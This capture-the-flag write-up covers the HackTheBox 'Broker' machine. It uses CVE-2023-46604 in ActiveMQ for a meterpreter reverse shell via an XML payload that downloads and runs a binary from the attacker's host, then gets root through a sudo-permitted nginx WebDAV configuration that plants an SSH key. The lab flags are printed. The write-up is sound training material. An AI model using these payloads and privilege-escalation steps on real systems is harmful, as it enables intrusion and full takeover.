Metadata
- Platform: HackTheBox
- CTF: Broker
- OS: Linux
- Difficulty: Easy
Summary
One of the target’s exposed services suffers from a deserialization error, which can be exploited to gain remote code execution. After setting up the necessary requirements, we trick the target into spawning a reverse shell to get a foothold. Afterwards, we leverage this compromised user’s root access to nginx to create a high privileges web server, over which we upload our own SSH key for the root user. Once this is done, we can connect as said user over SSH, compromising the machine.
Solution
Reconnaissance
With the help of Nmap, we can gather some information about nine open ports.
nmap -sC -sV 10.10.11.243 -p- -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 11:47 CEST
Nmap scan report for 10.10.11.243
Host is up (0.12s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp open mqtt
|_mqtt-subscribe: Failed to receive control packet from server.
5672/tcp open amqp?
8161/tcp open http Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
36451/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
61614/tcp open http Jetty 9.4.39.v20210325
|_http-title: Site doesnt have a title.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open apachemq ActiveMQ OpenWire transport 5.15.15Besides the open SSH port, we find a total of three web services related to Jetty. Sadly, the websites on port 80 and 8161 prompt us for a login, before we can inspect the page, while the service on port 61614 doesn’t return anything at all.
Due to these results, we should instead take a look at the other five ports. However, once against all ports besides the one on port 61616 return anything when we connect via Netcat. Really, the only information we have from these ports is the service’s version on port 61616 to be ActiveMQ OpenWire transport 5.15.15.
User Flag
Quick research about this version yields a few results, such that there is the CVE-2023-46604. Due to a deserialization error, this version is subject to remote command execution, and there are several existing Proof-of-Concepts for the exploit. To save ourselves some time, we can a Python-based one, like this one.
According to the exploit’s documentation, the exploit itself will only trick the target into downloading a malicious .xml file from a specified source, which will then execute the respective code. This requires a bit of setup. We need:
- the
.xmlfile, as well as our reverse shell payload - a web server hosting these files
- and a listener for the reverse shell payload
Let’s start with the reverse shell. Since we will be able to execute any payload of our choice, a meterpreter shell is the most comfortable choice. We can create one with MSFvenom in form of a Linux executable, since the target is a Linux machine.
msfvenom -p linux/meterpreter/reverse_tcp LHOST=10.10.16.5 LPORT=4444 -f elf -o shell.elf Now we need to adapt the .xml file, which contains the code that will be executed on the target. Since the poc.xml from the exploit already includes options for both Windows and Linux, we only need to comment out the Windows code, and adapt the Linux code, so it downloads and execute our reverse shell. Don’t forget to make shell.elf executable on the target system, once it was downloaded.
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<!-- <value>open</value>
<value>-a</value>
<value>calculator</value> -->
<value>bash</value>
<value>-c</value>
<value>curl http://10.10.16.5/shell.elf -o shell.elf; chmod +x shell.elf; ./shell.elf</value>
</list>
</constructor-arg>
</bean>
</beans>Once we saved this file as shell.xml, we can start the python HTTP server, which will serve reverse shell shell.elf, as well as shell.xml. Now the only thing left to prepare is the listener for the reverse shell. For this, we necessarily need mutli/handler of the Metasploit Framework, for which we need to match this module’s settings with the one of the created MSFvenom payload. Once this is done, execute the listener via run, and execute the payload.
python3 CVE-2023-46604-RCE.py -i 10.10.11.243 -p 61616 -u http://10.10.16.5/shell.xmlWe quickly get two connections to the web server, followed by a reverse shell on the listener as activemq.
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.243 - - [31/Mar/2025 12:27:04] "GET /shell.xml HTTP/1.1" 200 -
10.10.11.243 - - [31/Mar/2025 12:27:05] "GET /shell.xml HTTP/1.1" 200 -
10.10.11.243 - - [31/Mar/2025 12:27:05] "GET /shell.elf HTTP/1.1" 200 -msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Sending stage (3045380 bytes) to 10.10.11.243
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.10.11.243:45996) at 2025-03-31 12:27:09 +0200
meterpreter > shell
Process 1365 created.
Channel 1 created.
whoami
activemqIn this user’s home directory, we find the user flag.
98bef5d8a0fbce6d8a837da6358e9f23
Root Flag
Even without a password, we are allowed to list the sudo privileges for this user.
sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginxThese results tell us that activemq is allowed to execute nginx as the root user without providing a password. Just like many other powerful applications, there are multiple ways in which we could abuse this access right for privilege escalation. However, this post provides a simple script we can use for this purpose, with which we spawn a new website running as the root user. Using this, we can upload our own SSH authentication key in the according directory of this user by issuing a PUT request to the specific endpoint. The script looks like this.
echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1339;
root /;
autoindex on;
dav_methods PUT;
}
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat .ssh/id_rsa
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat .ssh/id_rsa.pub)"
echo "[+] Use the SSH key to get access"Let’s save this shell script to our attacking machine and use the upload feature of the Meterpreter shell, in order to transfer it to the target. Afterwards, we only need to add the execution permissions and execute the script.
chmod +x exploit.sh
./exploit.shAfter pressing enter a few times, we can copy the presented SSH key to our attacking machine and save it as key. Once we set the permission bits accordingly, we can connect to the target as the root user an claim the root flag.
chmod 400 key
ssh root@10.10.11.243 -i key86953bc57fd1326607c5c14b1a224bfe